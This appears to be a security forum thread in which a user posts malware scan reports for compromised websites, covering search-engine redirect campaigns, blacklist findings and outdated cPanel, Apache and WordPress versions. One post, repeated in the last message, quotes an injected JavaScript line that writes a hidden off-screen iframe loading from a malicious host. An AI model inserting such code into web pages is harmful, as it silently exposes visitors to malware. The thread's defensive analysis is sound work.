SE redirect and more?

[polonus]

Sucuri flags as with malware: Malware   Detected   Critical   
ISSUE DETECTED           DEFINITION            INFECTED URL
Internal Server Error   500-error?v1            htxp://amdc1786.com/404testpage4525d2fdc
Website Malware   MW:HTA:7   http://amdc1786.com/
Site error detected. Details: http://labs.sucuri.net/db/malware/500-error?v1
HTTP/1.1 500 Internal Server Error
SE visitors redirects or external link to htxp://www.116188.com/   (campaign: http://evuln.com/labs/redirect/www.116188.com/)
Visitors from search engines are redirected
to: htxp://www.116188.com/
474 sites infected with redirects to this URL
code directing to htxp://tp4.sinaimg.cn/2428793371/50/5624619302/1  Wish support -  Hallo sina!

Site found to be benign: http://zulu.zscaler.com/submission/show/51b24d56d5e182c434381b5b7d3db9a3-1407271339
Netcraft risk 1/10 -> http://toolbar.netcraft.com/site_report?url=http://amdc1786.com

Here I get a 404 error http://linkeddata.informatik.hu-berlin.de/uridbg/index.php?url=http%3A%2F%2Famdc1786.com%2Ftj.js&useragentheader=&acceptheader=

pol

[polonus]

See: http://killmalware.com/junalab.com/#
SE visitors redirects via obfuscated PHP code *
Visitors from search engines are redirected
to: htxp://aozpta.mrbonus.com/
aozpta.mrbonus dot com is reported by Yandex as suspicious
3164 sites infected with redirects to this URL
Sucuri scan reports:
Website Malware malware-entry-mwblacklisted35 htxp://junalab.com/20140418/
Website Malware malware-entry-mwblacklisted35 htxp://junalab.com/category/tool/
Website Malware malware-entry-mwblacklisted35 htxp://junalab.com/20140402/

Suspicious domain detected. Details: http://sucuri.net/malware/malware-entry-mwblacklisted35 Location: htxp://aozpta.mrbonus.com/
Suspicious domain detected. Details: http://sucuri.net/malware/malware-entry-mwblacklisted35 Location: htxp://aozpta.mrbonus.com/

External link check:
Please check this list for unknown links on your website:

htxp://www.dlmarket.jp/manufacture/index.php?consignors_id=4  -->  ''
htxp://www.dlmarket.jp/products/detail/262630  -->  ''
htxp://www.dlmarket.jp/products/detail/125456  -->  ''
htxp://www.dlmarket.jp/manufacturer.php/manufacturers_id/473  -->  'history2chart'

IDS alerts here: http://urlquery.net/report.php?id=1407272604852

Given as benign here: http://zulu.zscaler.com/submission/show/90a5349bdce8f3fd2b82c6e9bcd6c1d4-1407272473

IP badness history: https://www.virustotal.com/nl/ip-address/91.146.108.80/information/
Over 850 site domains on one and the same IP

Nothing blocked by avast! 

* Description of how the malware functions is given here by the renowned expert Redleg (the fileviewer guru):
https://productforums.google.com/forum/#!topic/webmasters/Xo0QoOnrhv0

polonus

[polonus]

See: http://killmalware.com/tsurkan.ru/#
SE visitors redirects
Visitors from search engines are redirected
to: htxp://redesorpserthea26.acmetoy.com/wstat/accepter.php?h=tsurkan.ru&u=/&f=60c9b82cf1cc2991008bc0dee0cfc093&d=d8e60afa912a144a8c6191b602e74808&r=/home/omivalka/public_html/tsurkan.ru
3 sites infected with redirects to this URL
index
Severity:   Suspicious
Reason:   Detected suspicious redirection to external web resources at HTTP level.
Details:   Detected HTTP redirection to htxp://redesorpserthea26.acmetoy.com/wstat/accepter.php?h=tsurkan.ru%26u=/%26f=60c9b82cf1cc2991008bc0dee0cfc093%26d=d8e60afa912a144a8c6191b602e74808%26r=/home/omivalka/public_html/tsurkan.ru.

Website Outdated cPanel Found   cPanel Security   cPanel 11.42.1.16
Outdated Web Server Apache Found   Vulnerabilities on Apache 2.2   Apache/2.2.25

Not alerted here: http://urlquery.net/report.php?id=1407398164168

pol

[polonus]

Website Malware   malware-entry-mwblacklisted35   htxp://patsecova.com/index.php?appservlang=th
Suspicious domain detected. Details: http://sucuri.net/malware/malware-entry-mwblacklisted35
Location: htxp://kmlps.mrslove.com/ 1579 sites infected with redirects to this URL, re:
https://www.virustotal.com/nl/url/07df993dc412cefa5e07749ee56443fc3b790c6b68c98fd90d5a1a7b22d2824d/analysis/1369806746/

Vulnerabilities: http://www.cvedetails.com/vulnerability-list/vendor_id-74/product_id-128/PHP-PHP.html
via AppServ Open Project 2.5.10
PHP Information Version 5.2.6
Apache Web Server เวอร์ชั่น 2.2.8
PHP Script Language เวอร์ชั่น 5.2.6
MySQL Database เวอร์ชั่น 5.0.51b
phpMyAdmin Database Manager เวอร์ชั่น 2.10.3

polonus

[polonus]

http://killmalware.com/mgtravel.net/#
See: Blacklisting status
Yandex reports mgtravel.net as suspicious website
Blacklisted
SE visitors redirects
Visitors from search engines are redirected
to: htXp://www.caribsoft-online.biz/templates/rhuk_solarflare_ii/images/index.php
1165 sites infected with redirects to this URL
See: https://www.virustotal.com/nl/url/f45ee3c2c6f99718e52490cacd03f632929cd7dee6f7966016dc19146d85f2a7/analysis/1407702697/
Blacklisted and site probably compromised via CPanel.
IP badness histort: https://www.virustotal.com/nl/ip-address/79.124.75.132/information/

polonus

[polonus]

Asafaweb scan results - error and three warnings: https://asafaweb.com/Scan?Url=lhfzsysg.com
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727  via proxy1.1
suspicious file detected:
index
Severity:   Suspicious
Reason:   Detected suspicious redirection to external web resources at HTTP level.
Details:   Detected HTTP redirection to htxp://t.9coku.com/mm/t.htm?lhfzsysg.com.
173 sites infected with redirects to this URL
File size[byte]:   0
 103.30.7
File type:   Unknown

IPO badness history with 136 domains on same IP: https://www.virustotal.com/nl/ip-address/103.30.7.64/information/

pol

[polonus]

Website:   00x dot ru -> http://quttera.com/detailed_report/00x.ru
Status:   Infected With Malware. I
SE visitors redirects
Chain of redirects found:
to: htXp://goldline.pro/?partner=pashkela  consider: http://labs.sucuri.net/?details=glbonus.in
15 sites infected with redirects to this URL
to: htxp://glbonus.in/?partner=pashkela
122 sites infected with redirects to this URL
to: htxp://goo.gl/qsao2y
3250 sites infected with redirects to this URL
Website Malware   MW:HTA:7   htxp://00x.ru
System Details:
Running on: Apache/2.2.25
System info: (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6

Suspicious conditional redirect. Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:htxp://goo.gl/qSaO2y

Web application details:
Running cPanel 11.38.2.6: 00x.ru:2082
cPanel version 11.38.2.6 outdated: Upgrade required.
Outdated cPanel Found: cPanel 11.38.2.6
Outdated Web Server Apache Found: Apache/2.2.25

pol

[polonus]

And there is more to the previous scan: http://urlquery.net/report.php?id=1407780894347
in the form of an external link to u6151.55.spylog dot com
-> bad web rep: https://www.mywot.com/en/scorecard/spylog.com?utm_source=addon&utm_content=popup
PHISHing and tracking going on via that external link, read : http://www.wilderssecurity.com/threads/xxx-spylog-com.35828/

polonus

[polonus]

Parked and expired site. See: http://killmalware.com/ergosystem.com/
IP badness history: https://www.virustotal.com/nl/ip-address/66.151.181.49/information/
Javascript Check supicious: Suspicious

script type="text/javascript">document.write(unescape('%3cscript type="text/javascript" src="' + (('https:' == document.location.protocol) ? 'https:' : 'http:') + '//cbi.boldchat.c... *
Google Browser Difference: Not identical

Google: 53961 bytes       Firefox: 50282 bytes
Diff:         3679 bytes

First difference:
ink href="htxp://images.buydomains.com/images/micro.png" rel="shortcut icon"> <link rel="icon" href="htxp://images.buydomains.com/images/favicon.ico" /> <link rel="can...

External link: https://checkout.dev.buydomains.com 
Suspicious web rep: https://www.mywot.com/en/scorecard/boldchat.com?utm_source=addon&utm_content=popup *

Outdated software and vulnerable to SEO spam: Outdated Web Server Apache Found   Vulnerabilities on Apache 2.2   Apache/2.2.15

Suspicious file reported here: http://quttera.com/detailed_report/ergosystem.com
index
Severity:   Suspicious
Reason:   Detected suspicious redirection to external web resources at HTTP level.
Details:   Detected HTTP redirection to htxp://www.buydomains.com/lander/ergosystem.com?domain=ergosystem.com%26utm_source=ergosystem.com%26utm_medium=click%26utm_campaign=TDFS-OO-BDLander%26traffic_id=TDFS-OO-BDLander%26traffic_type=tdfs.
File size[byte]:   0

pol

[polonus]

See: http://killmalware.com/handsgg.ru/# & https://www.virustotal.com/nl/url/cc7f310ae20c2ca8a4666dd6f7ccace1d74b413e8bbc8d930d8eac58cbcf07f9/analysis/
Detected: http://sitecheck.sucuri.net/results/clineagency.com
System Details:
Running on: nginx

Web application details:
Application: WordPress 3.4.1 - http://www.wordpress.org
Running cPanel 11.42.1.25: clineagency.com:2082

Web application version:
WordPress version: WordPress 3.4.1
Wordpress version from source: 3.4.1
Wordpress Version 3.3 or 3.4 based on: htxp://clineagency.com/wp-includes/js/autosave.js
WordPress theme: htxp://clineagency.com/wp-content/themes/twentyeleven/
WordPress version outdated: Upgrade required.
Outdated WordPress Found: WordPress Under 3.9.1

Read from our forum member, !Donovan: https://websiteanalystsresource.wordpress.com/tag/portrelay-com/

polonus

[polonus]

See: https://www.virustotal.com/nl/url/34b39df83b6a367b330e0453984813f735dd874decdcd9768a9a212d241d8a74/analysis/1408108630/
Blaclisted by Yandex: http://quttera.com/detailed_report/asphalt5.ru

ISSUE DETECTED   DEFINITION   INFECTED URL
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/media/system/js/mootools-core.js
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/media/system/js/core.js
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/media/system/js/caption.js
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/media/widgetkit/js/jquery.js
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/cache/widgetkit/widgetkit-b35d7d42.js
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/templates/yoo_vox/warp/js/warp.js
Known javascript malware. Details: http://labs.sucuri.net/db/malware/mwjs-iframe-injected691?v2
document.write('<iframe src="htxp://actions.rdenham.co.uk/barbadiga.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>');
Re: http://urlquery.net/report.php?id=1408108535841

polonus

[Pondus]

See: https://www.virustotal.com/nl/url/34b39df83b6a367b330e0453984813f735dd874decdcd9768a9a212d241d8a74/analysis/1408108630/
Blaclisted by Yandex: http://quttera.com/detailed_report/asphalt5.ru

ISSUE DETECTED   DEFINITION   INFECTED URL
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/media/system/js/mootools-core.js
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/media/system/js/core.js
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/media/system/js/caption.js
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/media/widgetkit/js/jquery.js
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/cache/widgetkit/widgetkit-b35d7d42.js
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/templates/yoo_vox/warp/js/warp.js
Known javascript malware. Details: http://labs.sucuri.net/db/malware/mwjs-iframe-injected691?v2
document.write('<iframe src="htxp://actions.rdenham.co.uk/barbadiga.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>');
Re: http://urlquery.net/report.php?id=1408108535841

polonus

VirusTotal
https://www.virustotal.com/en/file/2032356eae4d1d19a42563a3ecdbd376f0f69a525e8662572031f5eba280baed/analysis/1408112656/
https://www.virustotal.com/en/file/e09708089ab891a507336a96c5b3d2d674a4b9468b5d8687b630f059d3ffe102/analysis/1408112882/